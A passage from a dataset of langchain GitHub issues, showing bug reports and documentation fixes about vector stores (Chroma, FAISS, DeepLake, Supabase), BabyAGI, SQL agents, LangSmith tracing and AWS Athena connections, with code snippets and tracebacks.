tesla","id":"wikipedia_fathead","is_stackexchange":null,"js_callback_name":"wikipedia","live_date":null,"maintainer":{"github":"duckduckgo"},"name":"Wikipedia","perl_module":"DDG::Fathead::Wikipedia","producer":null,"production_state":"online","repo":"fathead","signal_from":"wikipedia_fathead","src_domain":"en.wikipedia.org","src_id":1,"src_name":"Wikipedia","src_options":{"directory":"","is_fanon":0,"is_mediawiki":1,"is_wikipedia":1,"language":"en","min_abstract_length":"20","skip_abstract":0,"skip_abstract_paren":0,"skip_end":"0","skip_icon":0,"skip_image_name":0,"skip_qr":"","source_skip":"","src_info":""},"src_url":null,"status":"live","tab":"About","topic":["productivity"],"unsafe":0}}` | DOC: Please replace SERP_API examples with an alternative | https://api.github.com/repos/langchain-ai/langchain/issues/7448/comments | 1 | 2023-07-09T21:52:15Z | 2023-10-08T23:09:17Z | https://github.com/langchain-ai/langchain/issues/7448 | 1,795,579,900 | 7,448 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
https://python.langchain.com/docs/modules/data_connection/vectorstores/integrations/supabase
Under '-- Create a table to store your documents' the id column is set to big serial but it is referenced later as uuid 10 lines down when creating the function
### Idea or request for content:
It is currently
`id bigserial primary key,`
Changing it to this fixed the error I was getting
'id uuid primary key,' | DOC: Table creation for Supabase (Postgres) has incorrect type | https://api.github.com/repos/langchain-ai/langchain/issues/7446/comments | 3 | 2023-07-09T20:33:00Z | 2023-08-11T00:15:17Z | https://github.com/langchain-ai/langchain/issues/7446 | 1,795,552,337 | 7,446 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain ==0.0.228, watchdog==3.0.0, streamlit==1.24.0, databutton==0.34.0, ipykernel==6.23.3
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce the error:
1. Tried to use from langchain.experimental import BabyAGI with a FAISS db, got the error: ValueError: Tried to add ids that already exist: {'result_1'}
2. Tried the code directly from the Langchain Docs: https://python.langchain.com/docs/use_cases/agents/baby_agi, I got the same error.
Code:
import os
from langchain.chat_models import AzureChatOpenAI
from langchain.embeddings.cohere import CohereEmbeddings
import faiss
from langchain.vectorstores import FAISS
from langchain.docstore import InMemoryDocstore
from langchain import OpenAI
from langchain.experimental import BabyAGI
BASE_URL = "https://openaielle.openai.azure.com/"
API_KEY = db.secrets.get("AZURE_OPENAI_KEY")
DEPLOYMENT_NAME = "GPT35turbo"
llm = AzureChatOpenAI(
openai_api_base=BASE_URL,
openai_api_version="2023-03-15-preview",
deployment_name=DEPLOYMENT_NAME,
openai_api_key=API_KEY,
openai_api_type="azure",
streaming=True,
verbose=True,
temperature=0,
max_tokens=1500,
top_p=0.95)
embeddings_model = CohereEmbeddings(model = "embed-english-v2.0")
index = faiss.IndexFlatL2(4096)
vectorstore = FAISS(embeddings_model.embed_query, index, InMemoryDocstore({}), {})
# set the goal
goal = "Plan a trip to the Grand Canyon"
# create thebabyagi agent
# If max_iterations is None, the agent may go on forever if stuck in loops
baby_agi = BabyAGI.from_llm(
llm=llm,
vectorstore=vectorstore,
verbose=False,
max_iterations=3
)
response = baby_agi({"objective": goal})
print(response)
Error:
ValueError: Tried to add ids that already exist: {'result_1'}
Traceback:
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/streamlit/runtime/scriptrunner/script_runner.py", line 552, in _run_script
exec(code, module.__dict__)
File "/app/run/multipage/pages/8_Exp_Baby_AGI.py", line 61, in <module>
response = baby_agi({"objective": goal})
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/chains/base.py", line 243, in __call__
raise e
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/chains/base.py", line 237, in __call__
self._call(inputs, run_manager=run_manager)
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/experimental/autonomous_agents/baby_agi/baby_agi.py", line 142, in _call
self.vectorstore.add_texts(
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/vectorstores/faiss.py", line 150, in add_texts
return self.__add(texts, embeddings, metadatas=metadatas, ids=ids, **kwargs)
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/vectorstores/faiss.py", line 121, in __add
self.docstore.add({_id: doc for _, _id, doc in full_info})
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/docstore/in_memory.py", line 19, in add
raise ValueError(f"Tried to add ids that already exist: {overlapping}")
### Expected behavior
I would expect the agent to run and generate the desired output instead of the error: ValueError: Tried to add ids that already exist: {'result_1'}
I seems that the error is happening in this class: BabyAGI > _call > # Step 3: Store the result in Pinecone
I was able to fix this by assigning a random number to each iteration of result_id, here is the fix, however this is not working in the experimental BabyAGI instance.
Fix:
import random
# Step 3: Store the result in Pinecone
result_id = f"result_{task['task_id']}_{random.randint(0, 1000)}"
self.vectorstore.add_texts(
texts=[result],
metadatas=[{"task": task["task_name"]}],
ids=[result_id],
)
Thank you :) | BabyAGI: Error storing results in vdb | https://api.github.com/repos/langchain-ai/langchain/issues/7445/comments | 5 | 2023-07-09T20:31:00Z | 2023-10-19T16:06:19Z | https://github.com/langchain-ai/langchain/issues/7445 | 1,795,551,743 | 7,445 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hi. I'm trying to test the duckduckgoSearchRun tool and I'm running the basic example from the documentation https://python.langchain.com/docs/modules/agents/tools/integrations/ddg . I already have installed the certificates without any errors:
`./Install\ Certificates.command
-- pip install --upgrade certifi
Requirement already satisfied: certifi in /Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages (2023.5.7)
-- removing any existing file or link
-- creating symlink to certifi certificate bundle
-- setting permissions
-- update complete`
But even when I do that and even when I set verify false. I still get SSL certificate error
`import ssl
import duckduckgo_search
from lxml import html
from langchain.tools import DuckDuckGoSearchRun
DuckDuckGoSearchRun.requests_kwargs = {'verify': False}
search = DuckDuckGoSearchRun()
search.run("Obama's first name?")`
Here is the error:
`---------------------------------------------------------------------------
SSLCertVerificationError Traceback (most recent call last)
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/_exceptions.py:10](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/_exceptions.py:10), in map_exceptions(map)
9 try:
---> 10 yield
11 except Exception as exc: # noqa: PIE786
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/backends/sync.py:62](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/backends/sync.py:62), in SyncStream.start_tls(self, ssl_context, server_hostname, timeout)
61 self.close()
---> 62 raise exc
63 return SyncStream(sock)
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/backends/sync.py:57](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/backends/sync.py:57), in SyncStream.start_tls(self, ssl_context, server_hostname, timeout)
56 self._sock.settimeout(timeout)
---> 57 sock = ssl_context.wrap_socket(
58 self._sock, server_hostname=server_hostname
59 )
60 except Exception as exc: # pragma: nocover
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:517](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:517), in SSLContext.wrap_socket(self, sock, server_side, do_handshake_on_connect, suppress_ragged_eofs, server_hostname, session)
511 def wrap_socket(self, sock, server_side=False,
512 do_handshake_on_connect=True,
513 suppress_ragged_eofs=True,
514 server_hostname=None, session=None):
515 # SSLSocket class handles server_hostname encoding before it calls
516 # ctx._wrap_socket()
--> 517 return self.sslsocket_class._create(
518 sock=sock,
519 server_side=server_side,
520 do_handshake_on_connect=do_handshake_on_connect,
521 suppress_ragged_eofs=suppress_ragged_eofs,
522 server_hostname=server_hostname,
523 context=self,
524 session=session
525 )
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:1075](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:1075), in SSLSocket._create(cls, sock, server_side, do_handshake_on_connect, suppress_ragged_eofs, server_hostname, context, session)
1074 raise ValueError("do_handshake_on_connect should not be specified for non-blocking sockets")
-> 1075 self.do_handshake()
1076 except (OSError, ValueError):
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:1346](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:1346), in SSLSocket.do_handshake(self, block)
1345 self.settimeout(None)
-> 1346 self._sslobj.do_handshake()
1347 finally:
SSLCertVerificationError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate in certificate chain (_ssl.c:992)
During handling of the above exception, another exception occurred:
ConnectError Traceback (most recent call last)`
### Suggestion:
_No response_ | SSL certificate problem (even when verify = False) | https://api.github.com/repos/langchain-ai/langchain/issues/7443/comments | 1 | 2023-07-09T19:15:44Z | 2023-10-15T16:04:38Z | https://github.com/langchain-ai/langchain/issues/7443 | 1,795,527,141 | 7,443 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain: 0.0.215
python: 3.10.11
OS: Ubuntu 18.04
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
While querying a SQL database, the agent gets stuck in an infinite loop due to `list_tables_sql_db` not being a valid tool.
```
> Entering new chain...
Action: list_tables_sql_db
Action Input:
Observation: list_tables_sql_db is not a valid tool, try another one.
Thought:I should look at the tables in the database to see what I can query. Then I should query the schema of the most relevant tables.
Action: list_tables_sql_db
Action Input:
Observation: list_tables_sql_db is not a valid tool, try another one.
Thought:I should look at the tables in the database to see what I can query. Then I should query the schema of the most relevant tables.
Action: list_tables_sql_db
Action Input:
Observation: list_tables_sql_db is not a valid tool, try another one.
Thought:I don't know how to answer this question.
Thought: I now know the final answer
Final Answer: I don't know
> Finished chain.
```
### Expected behavior
The agent should get the list of tables by using the `list_tables_sql_db` tool and then query the most relevant one. | list_tables_sql_db is not a valid tool, try another one. | https://api.github.com/repos/langchain-ai/langchain/issues/7440/comments | 3 | 2023-07-09T18:10:42Z | 2024-03-10T15:17:49Z | https://github.com/langchain-ai/langchain/issues/7440 | 1,795,505,933 | 7,440 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
https://python.langchain.com/docs/modules/data_connection/vectorstores/integrations/chroma.html#basic-example-including-saving-to-disk
## Environment
- macOS
- Python 3.10.9
- langchain 0.0.228
- chromadb 0.3.26
Use https://github.com/hwchase17/langchain/blob/v0.0.228/docs/extras/modules/state_of_the_union.txt
## Procedure
1. Run the following Python script
ref: https://github.com/hwchase17/langchain/blob/v0.0.228/docs/extras/modules/data_connection/vectorstores/integrations/chroma.ipynb
```diff
# import
from langchain.embeddings.sentence_transformer import SentenceTransformerEmbeddings
from langchain.text_splitter import CharacterTextSplitter
from langchain.vectorstores import Chroma
from langchain.document_loaders import TextLoader
# load the document and split it into chunks
loader = TextLoader("../../../state_of_the_union.txt")
documents = loader.load()
# split it into chunks
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
docs = text_splitter.split_documents(documents)
# create the open-source embedding function
embedding_function = SentenceTransformerEmbeddings(model_name="all-MiniLM-L6-v2")
# load it into Chroma
db = Chroma.from_documents(docs, embedding_function)
# query it
query = "What did the president say about Ketanji Brown Jackson"
docs = db.similarity_search(query)
# print results
print(docs[0].page_content)
# save to disk
db2 = Chroma.from_documents(docs, embedding_function, persist_directory="./chroma_db")
db2.persist()
-docs = db.similarity_search(query)
+docs = db2.similarity_search(query)
# load from disk
db3 = Chroma(persist_directory="./chroma_db")
-docs = db.similarity_search(query)
+docs = db3.similarity_search(query) # ValueError raised
print(docs[0].page_content)
```
## Expected behavior
`print(docs[0].page_content)` with db3
## Actual behavior
>ValueError: You must provide embeddings or a function to compute them
```
Traceback (most recent call last):
File "/.../issue_report.py", line 35, in <module>
docs = db3.similarity_search(query)
File "/.../venv/lib/python3.10/site-packages/langchain/vectorstores/chroma.py", line 174, in similarity_search
docs_and_scores = self.similarity_search_with_score(query, k, filter=filter)
File "/.../venv/lib/python3.10/site-packages/langchain/vectorstores/chroma.py", line 242, in similarity_search_with_score
results = self.__query_collection(
File "/.../venv/lib/python3.10/site-packages/langchain/utils.py", line 55, in wrapper
return func(*args, **kwargs)
File "/.../venv/lib/python3.10/site-packages/langchain/vectorstores/chroma.py", line 121, in __query_collection
return self._collection.query(
File "/.../venv/lib/python3.10/site-packages/chromadb/api/models/Collection.py", line 209, in query
raise ValueError(
ValueError: You must provide embeddings or a function to compute them
```
### Idea or request for content:
Fixed by specifying the `embedding_function` parameter.
```diff
-db3 = Chroma(persist_directory="./chroma_db")
+db3 = Chroma(persist_directory="./chroma_db", embedding_function=embedding_function)
docs = db3.similarity_search(query)
print(docs[0].page_content)
```
(Added) ref: https://github.com/hwchase17/langchain/blob/v0.0.228/langchain/vectorstores/chroma.py#L62 | DOC: Bug in loading Chroma from disk (vectorstores/integrations/chroma) | https://api.github.com/repos/langchain-ai/langchain/issues/7436/comments | 2 | 2023-07-09T17:05:24Z | 2023-07-10T11:17:19Z | https://github.com/langchain-ai/langchain/issues/7436 | 1,795,484,020 | 7,436 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
I followed the documentation @ https://python.langchain.com/docs/use_cases/code/twitter-the-algorithm-analysis-deeplake.
I replaced 'twitter-the-algorithm' with another code base I'm analyzing and used my own credentials from OpenAI and Deep Lake.
When I run the code (on VS Code for Mac with M1 chip), I get the following error:
_ValueError: setting an array element with a sequence. The requested array has an inhomogeneous shape after 1 dimensions. The detected shape was (1435,) + inhomogeneous part.
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/Users/catherineswope/Desktop/LangChain/fromLangChain.py", line 37, in <module>
db.add_documents(texts)
File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/langchain/vectorstores/base.py", line 91, in add_documents
return self.add_texts(texts, metadatas, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/langchain/vectorstores/deeplake.py", line 184, in add_texts
return self.vectorstore.add(
^^^^^^^^^^^^^^^^^^^^^
File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/deeplake/core/vectorstore/deeplake_vectorstore.py", line 271, in add
dataset_utils.extend_or_ingest_dataset(
File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/deeplake/core/vectorstore/vector_search/dataset/dataset.py", line 409, in extend_or_ingest_dataset
raise IncorrectEmbeddingShapeError()
deeplake.util.exceptions.IncorrectEmbeddingShapeError: The embedding function returned embeddings of different shapes. Please either use different embedding function or exclude invalid files that are not supported by the embedding function._
This is the code snippet from my actual code:
import os
import getpass
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.vectorstores import DeepLake
from langchain.document_loaders import TextLoader
#get OPENAI API KEY and ACTIVELOOP_TOKEN
os.environ["OPENAI_API_KEY"] = getpass.getpass("OpenAI API Key:")
os.environ["ACTIVELOOP_TOKEN"] = getpass.getpass("Activeloop Token:")
embeddings = OpenAIEmbeddings(disallowed_special=())
#clone from chattydocs git hub repo removedcomments branch and copy/paste path
root_dir = "/Users/catherineswope/chattydocs/incubator-baremaps-0.7.1-removedcomments"
docs = []
for dirpath, dirnames, filenames in os.walk(root_dir):
for file in filenames:
try:
loader = TextLoader(os.path.join(dirpath, file), encoding="utf-8")
docs.extend(loader.load_and_split())
except Exception as e:
pass
from langchain.text_splitter import CharacterTextSplitter
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(docs)
username = "caswvu" # replace with your username from app.activeloop.ai
db = DeepLake(
dataset_path=f"hub://caswvu/baremaps",
embedding_function=embeddings,
)
db.add_documents(texts)
db = DeepLake(
dataset_path="hub://caswvu/baremaps",
read_only=True,
embedding_function=embeddings,
)
retriever = db.as_retriever()
retriever.search_kwargs["distance_metric"] = "cos"
retriever.search_kwargs["fetch_k"] = 100
retriever.search_kwargs["maximal_marginal_relevance"] = True
retriever.search_kwargs["k"] = 10
from langchain.chat_models import ChatOpenAI
from langchain.chains import ConversationalRetrievalChain
model = ChatOpenAI(model_name="gpt-3.5-turbo") # switch to 'gpt-4'
qa = ConversationalRetrievalChain.from_llm(model, retriever=retriever)
questions = [
"What does this code do?",
]
chat_history = []
for question in questions:
result = qa({"question": question, "chat_history": chat_history})
chat_history.append((question, result["answer"]))
print(f"-> **Question**: {question} \n")
print(f"**Answer**: {result['answer']} \n")
### Idea or request for content:
Can you please help me understand how to fix the code to address the error message? Also, if applicable, address in the documentation so that others can avoid as well. Thank you! | DOC: Code/twitter-the-algorithm-analysis-deeplake not working as written | https://api.github.com/repos/langchain-ai/langchain/issues/7435/comments | 8 | 2023-07-09T15:55:06Z | 2023-10-19T16:06:23Z | https://github.com/langchain-ai/langchain/issues/7435 | 1,795,458,482 | 7,435 |
[
"hwchase17",
"langchain"
]
| ### System Info
```
$ uname -a
MINGW64_NT-10.0-19045 LAPTOP-4HTFESLT 3.3.6-341.x86_64 2022-09-05 20:28 UTC x86_64 Msys
$ python --version
Python 3.10.11
$ pip show langchain
Name: langchain
Version: 0.0.228
Summary: Building applications with LLMs through composability
Home-page: https://www.github.com/hwchase17/langchain
Author:
Author-email:
License: MIT
Location: c:\users\happy\appdata\local\packages\pythonsoftwarefoundation.python.3.10_qbz5n2kfra8p0\localcache\local-packages\python310\site-packages
Requires: aiohttp, async-timeout, dataclasses-json, langchainplus-sdk, numexpr, numpy, openapi-schema-pydantic, pydantic, PyYAML, requests, SQLAlchemy, tenacity
Required-by:
```
### Who can help?
I cannot get a trace on langchain. Error:
```
File "c:\Users\happy\Documents\Projects\askjane\.venv\lib\site-packages\langchain\callbacks\manager.py", line 1702, in _configure
logger.warning(
Message: 'Unable to load requested LangChainTracer. To disable this warning, unset the LANGCHAIN_TRACING_V2 environment variables.'
Arguments: (LangChainPlusUserError('API key must be provided when using hosted LangChain+ API'),)
```
I do this check:
```
print(os.environ["LANGCHAIN-API-KEY"])
```
the correct LangchainPlus/langsmith/langchain api key is shown. I thought this was how it was done. I do set the other os envionment variables.
It doesn't pick up my api key.
i apologize if i am doing something stupid. but it's not working to the best of my knowledge.
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
import os
os.environ["OPENAI_API_KEY"] = "..."
os.environ["LANGCHAIN-API-KEY"] = "..."
os.environ["LANGCHAIN_TRACING_V2"] = "true"
os.environ["LANGCHAIN_ENDPOINT"] = "https://api.langchain.plus"
os.environ["LANGCHAIN_PROJECT"] = "Explore Evaluating index using LLM"
print(os.environ["LANGCHAIN-API-KEY"])
from langchain import OpenAI
OpenAI().predict("Hello, world!")
### Expected behavior
go to langsmith and see the trace. | Have set my langchain+ tracing key, it is not being recognized | https://api.github.com/repos/langchain-ai/langchain/issues/7431/comments | 3 | 2023-07-09T14:50:31Z | 2024-08-08T13:14:06Z | https://github.com/langchain-ai/langchain/issues/7431 | 1,795,434,040 | 7,431 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.216
langchainplus-sdk==0.0.17
python==3.10
I'm trying to connect SQLDatabaseChain to AWS Athena and getting the following error:
```
conString = f"awsathena+rest://{AWS_ACCESS_KEY_ID}:{AWS_SECRET_ACCESS_KEY}@athena.{AWS_REGION_ID}.amazonaws.com/{DATABASE}"
engine_args={
's3_staging_dir': "s3://mybuckets3/",
'work_group':'primary'
}
db = SQLDatabase.from_uri(database_uri=conString, engine_args=engine_args)
TypeError Traceback (most recent call last)
Cell In[14], line 2
1 #db = SQLDatabase.from_uri(conString)
----> 2 db = SQLDatabase.from_uri(database_uri=conString, engine_args=engine_args)
File ~\.conda\envs\generativeai\lib\site-packages\langchain\sql_database.py:124, in SQLDatabase.from_uri(cls, database_uri, engine_args, **kwargs)
122 """Construct a SQLAlchemy engine from URI."""
123 _engine_args = engine_args or {}
--> 124 return cls(create_engine(database_uri, **_engine_args), **kwargs)
File <string>:2, in create_engine(url, **kwargs)
File ~\.conda\envs\generativeai\lib\site-packages\sqlalchemy\util\deprecations.py:281, in deprecated_params.<locals>.decorate.<locals>.warned(fn, *args, **kwargs)
274 if m in kwargs:
275 _warn_with_version(
276 messages[m],
277 versions[m],
278 version_warnings[m],
279 stacklevel=3,
280 )
--> 281 return fn(*args, **kwargs)
File ~\.conda\envs\generativeai\lib\site-packages\sqlalchemy\engine\create.py:680, in create_engine(url, **kwargs)
678 # all kwargs should be consumed
679 if kwargs:
--> 680 raise TypeError(
681 "Invalid argument(s) %s sent to create_engine(), "
682 "using configuration %s/%s/%s. Please check that the "
683 "keyword arguments are appropriate for this combination "
684 "of components."
685 % (
686 ",".join("'%s'" % k for k in kwargs),
687 dialect.__class__.__name__,
688 pool.__class__.__name__,
689 engineclass.__name__,
690 )
691 )
693 engine = engineclass(pool, dialect, u, **engine_args)
695 if _initialize:
TypeError: Invalid argument(s) 's3_staging_dir','work_group' sent to create_engine(), using configuration AthenaRestDialect/QueuePool/Engine. Please check that the keyword arguments are appropriate for this combination of components.
```
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Above
### Expected behavior
Langchain connected to aws athena | SQLDatabase and SQLDatabaseChain with AWS Athena | https://api.github.com/repos/langchain-ai/langchain/issues/7430/comments | 12 | 2023-07-09T13:46:19Z | 2024-02-27T16:08:30Z | https://github.com/langchain-ai/langchain/issues/7430 | 1,795,409,409 | 7,430 |
[
"hwchase17",
"langchain"
]
| ### System Info (M1 mac)
Python implementation: CPython
Python version : 3.11.4
IPython version : 8.14.0
Compiler : GCC 12.2.0
OS : Linux
Release : 5.15.49-linuxkit-pr
Machine : aarch64
Processor : CPU cores : 5
Architecture: 64bit
[('aiohttp', '3.8.4'), ('aiosignal', '1.3.1'), ('asttokens', '2.2.1'), ('async-timeout', '4.0.2'), ('attrs', '23.1.0'), ('backcall', '0.2.0'), ('blinker', '1.6.2'), ('certifi', '2023.5.7'), ('charset-normalizer', '3.2.0'), ('click', '8.1.4'), ('dataclasses-json', '0.5.9'), ('decorator', '5.1.1'), ('docarray', '0.35.0'), ('executing', '1.2.0'), ('faiss-cpu', '1.7.4'), ('flask', '2.3.2'), ('frozenlist', '1.3.3'), ('greenlet', '2.0.2'), ('idna', '3.4'), ('importlib-metadata', '6.8.0'), ('ipython', '8.14.0'), ('itsdangerous', '2.1.2'), ('jedi', '0.18.2'), ('jinja2', '3.1.2'), ('json5', '0.9.14'), **('langchain', '0.0.228'), ('langchainplus-sdk', '0.0.20')**, ('markdown-it-py', '3.0.0'), ('markupsafe', '2.1.3'), ('marshmallow', '3.19.0'), ('marshmallow-enum', '1.5.1'), ('matplotlib-inline', '0.1.6'), ('mdurl', '0.1.2'), ('multidict', '6.0.4'), ('mypy-extensions', '1.0.0'), ('numexpr', '2.8.4'), ('numpy', '1.25.1'), ('openai', '0.27.8'), ('openapi-schema-pydantic', '1.2.4'), ('orjson', '3.9.2'), ('packaging', '23.1'), ('parso', '0.8.3'), ('pexpect', '4.8.0'), ('pickleshare', '0.7.5'), ('pip', '23.1.2'), ('prompt-toolkit', '3.0.39'), ('psycopg2-binary', '2.9.6'), ('ptyprocess', '0.7.0'), ('pure-eval', '0.2.2'), ('pydantic', '1.10.11'), ('pygments', '2.15.1'), ('python-dotenv', '1.0.0'), ('python-json-logger', '2.0.7'), ('pyyaml', '6.0'), ('regex', '2023.6.3'), ('requests', '2.31.0'), ('rich', '13.4.2'), ('setuptools', '65.5.1'), ('six', '1.16.0'), ('slack-bolt', '1.18.0'), ('slack-sdk', '3.21.3'), ('sqlalchemy', '2.0.18'), ('stack-data', '0.6.2'), ('tenacity', '8.2.2'), ('tiktoken', '0.4.0'), ('tqdm', '4.65.0'), ('traitlets', '5.9.0'), ('types-requests', '2.31.0.1'), ('types-urllib3', '1.26.25.13'), ('typing-inspect', '0.9.0'), ('typing_extensions', '4.7.1'), ('urllib3', '2.0.3'), ('watermark', '2.4.3'), ('wcwidth', '0.2.6'), ('werkzeug', '2.3.6'), ('wheel', '0.40.0'), ('yarl', '1.9.2'), ('zipp', '3.16.0')]
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
target_query = 'What are the hyve rules?'
facts_docs = [
Document(page_content=f)
for f in [x.strip() for x in """
Under the banner of privacy, hyve empowers you to determine the visibility of your goals, providing you with options like Public (all hyve members can see your goal), Friends (only your trusted hyve connections can), and Private (for secret missions where you can personally invite the desired ones)
At hyve, we're all about protecting your details and your privacy, making sure everything stays safe and secure
The main goal of hyve is to provide you with the tools to reach your financial goals as quickly as possible, our motto is: "Get there faster!"
Resting as the sole financial community composed entirely of 100% verified real users, hyve assures that each user is genuine and verified, enhancing the safety of you and our community
Designed with privacy as a top priority, hyve puts the power in your hands to control exactly who you share your goals with
hyve prioritizes your personal data protection and privacy rights, using your data exclusively to expedite the achievement of your goals without sharing your information with any other parties, for more info please visit https://app.letshyve.com/privacy-policy
Being the master of your privacy and investment strategies, you have full control over your goal visibility, making hyve a perfect partner for your financial journey
The Round-Up Rule in hyve integrates savings into your daily habits by rounding up your everyday expenses, depositing the surplus into your savings goal, e.g. if you purchase a cup of coffee for $2.25, hyve rounds it up to $3, directing the $0.75 difference to your savings
The Automatic Rule in hyve enables our AI engine to analyze your income and spending habits, thereby determining how much you can safely save, so you don't have to worry about it
The Recurring Rule in hyve streamlines your savings by automatically transferring a specified amount to your savings on a set schedule, making saving as effortless as possible
The Matching Rule in hyve allows you to double your savings by having another user match every dollar you save towards a goal, creating a savings buddy experience
""".strip().split('\n')]
]
retriever = FAISS.from_documents(facts_docs, OpenAIEmbeddings())
docs = '\n'.join(d.page_content for d in retriever.similarity_search(target_query, k=10))
print(docs)
for a in ['Round-Up', 'Automatic', 'Recurring', 'Matching']:
assert a in docs, f'{a} not in docs'
```
### Expected behavior
The words that contain most information above are `hyve` and `rule`, it should return the lines which define the `Round-Up Rule in hyve`, `Automatic Rule in hyve`, `Recurring Rule in hyve`, `Matching Rule in hyve`.
instead, the best 2 result it finds are:
> At hyve, we're all about protecting your details and your privacy, making sure everything stays safe and secure
and
> Under the banner of privacy, hyve empowers you to determine the visibility of your goals, providing you with options like Public (all hyve members can see your goal), Friends (only your trusted hyve connections can), and Private (for secret missions where you can personally invite the desired ones)
which don't even have the word `rule` in them or have anything to do with rules.
The full list of results are:
```
At hyve, we're all about protecting your details and your privacy, making sure everything stays safe and secure
Under the banner of privacy, hyve empowers you to determine the visibility of your goals, providing you with options like Public (all hyve members can see your goal), Friends (only your trusted hyve connections can), and Private (for secret missions where you can personally invite the desired ones)
The Automatic Rule in hyve enables our AI engine to analyze your income and spending habits, thereby determining how much you can safely save, so you don't have to worry about it
Designed with privacy as a top priority, hyve puts the power in your hands to control exactly who you share your goals with
The main goal of hyve is to provide you with the tools to reach your financial goals as quickly as possible, our motto is: "Get there faster!"
Resting as the sole financial community composed entirely of 100% verified real users, hyve assures that each user is genuine and verified, enhancing the safety of you and our community
hyve prioritizes your personal data protection and privacy rights, using your data exclusively to expedite the achievement of your goals without sharing your information with any other parties, for more info please visit https://app.letshyve.com/privacy-policy
The Recurring Rule in hyve streamlines your savings by automatically transferring a specified amount to your savings on a set schedule, making saving as effortless as possible
The Matching Rule in hyve allows you to double your savings by having another user match every dollar you save towards a goal, creating a savings buddy experience
Being the master of your privacy and investment strategies, you have full control over your goal visibility, making hyve a perfect partner for your financial journey
```
which don't even include the `Round-Up Rule in hyve` line in the top 10.
